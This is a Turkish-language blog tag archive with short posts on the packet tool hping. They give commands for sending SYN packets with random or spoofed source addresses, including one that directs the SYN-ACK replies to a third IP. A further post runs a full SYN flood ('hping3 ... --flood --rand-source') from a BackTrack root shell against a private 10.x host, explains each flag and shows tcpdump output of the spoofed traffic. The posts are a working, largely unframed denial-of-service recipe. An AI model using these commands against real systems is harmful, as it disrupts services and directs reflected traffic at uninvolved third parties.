Etiket arşivi: hping

hping1

hping –rand-source -S -p 80 xxx.xxx.xxx.xxx– xx ip sine src ipsi random olan ve 80 portuna SYN bayraklı paketler gönder.

hping -a yyy.yyy.yyy.yyy -S -p 80 xxx.xxx.xxx.xxx -xx ipsine yyy ipsinden syn (80.porta) paketleri gönder. SYN-ACK paketleri yyy ipsine gidecektir.

Reklamlar

hping ve flood


root@bt:~# hping3 -d 122 -S -w 64 -p 80 10.56.90.12 --flood --rand-source
using eth0, addr: 10.56.90.15, MTU: 1500
HPING 10.56.90.12 (eth0 10.56.90.12): S set, 40 headers + 120 data bytes

--- 10.56.90.12 hping statistic ---
100 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
-d 122:122 byte'lık data
-S:SIN bayrağı
-w 64:64 TTL 
-p 80: dst port 80
--rand-source: src ip ler random oluşturulsun.
--flood : flood mod kullan. 

flood modda bir kaç saniye içerisinde hedefe 1000’ler ce paket gönderimi yapılabilir. Yukarıda ki komutla 10.56.90.12 nolu makinaya her paket farklı kaynaklardan geliyor gibi SYN paketleri gönderdik. tcpdump çıktısı aşağıdadır.



root@bt:/etc/network# tcpdump dst host 10.56.90.12
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:47:17.600589 IP 209.122.151.139.2406 > 10.56.90.12.www: S 1436648546:1436648668(122) win 64
17:47:17.601995 IP 178.81.255.60.2407 > 10.56.90.12.www: S 1705955575:1705955697(122) win 64
17:47:17.602201 IP 19.206.43.55.2408 > 10.56.90.12.www: S 1562290490:1562290612(122) win 64
17:47:17.602374 IP 36.189.9.197.2409 > 10.56.90.12.www: S 604641588:604641710(122) win 64
17:47:17.602530 IP 196.0.180.214.2410 > 10.56.90.12.www: S 1803770982:1803771104(122) win 64
17:47:17.602720 IP AAnnecy-551-1-17-160.w92-153.abo.wanadoo.fr.2411 > 10.56.90.12.www: S 288343201:288343323(122) win 64
17:47:17.602887 IP 120.185.180.254.2412 > 10.56.90.12.www: S 813778207:813778329(122) win 64
17:47:17.603042 IP 23.140.235.139.2413 > 10.56.90.12.www: S 656869372:656869494(122) win 64
17:47:17.603208 IP 224.9.55.23.2414 > 10.56.90.12.www: S 1015093568:1015093690(122) win 64
17:47:17.603360 IP 180.71.183.204.2415 > 10.56.90.12.www: S 1877170202:1877170324(122) win 64
17:47:17.603561 IP 162.221.67.19.2416 > 10.56.90.12.www: S 1513053936:1513054058(122) win 64
17:47:17.603716 IP 197.0.209.215.2417 > 10.56.90.12.www: S 876153697:876153819(122) win 64
17:47:17.603856 IP 125.26.125.157.adsl.dynamic.totbb.net.2418 > 10.56.90.12.www: S 843277992:843278114(122) win 64
17:47:17.604010 IP h223s10a9n47.user.nortelnetworks.com.2419 > 10.56.90.12.www: S 1567951363:1567951485(122) win 64
17:47:17.604177 IP 216-229-69-16-empty.fidnet.com.2420 > 10.56.90.12.www: S 2132378618:2132378740(122) win 64
17:47:17.604331 IP 100.183.141.52.2421 > 10.56.90.12.www: S 404964666:404964788(122) win 64
17:47:17.604482 IP 211.170.169.93.2422 > 10.56.90.12.www: S 1346133522:1346133644(122) win 64
17:47:17.604635 IP 163.242.189.52.2423 > 10.56.90.12.www: S 1804076725:1804076847(122) win 64
17:47:17.604819 IP 140.37.131.254.2424 > 10.56.90.12.www: S 99362479:99362601(122) win 64
17:47:17.604976 IP 254.154.21.43.2425 > 10.56.90.12.www: S 1266537163:1266537285(122) win 64
17:47:17.605110 IP 127.255.160.209.2426 > 10.56.90.12.www: S 2003554614:2003554736(122) win 64
17:47:17.605261 IP 178.190.187.221.2427 > 10.56.90.12.www: S 537031363:537031485(122) win 64
17:47:17.605403 IP 252.17.81.20.2428 > 10.56.90.12.www: S 1366970421:1366970543(122) win 64
^C17:47:17.605577 IP 28.81.43.5.2429 > 10.56.90.12.www: S 849389274:849389396(122) win 64

24 packets captured
16315 packets received by filter
16036 packets dropped by kernel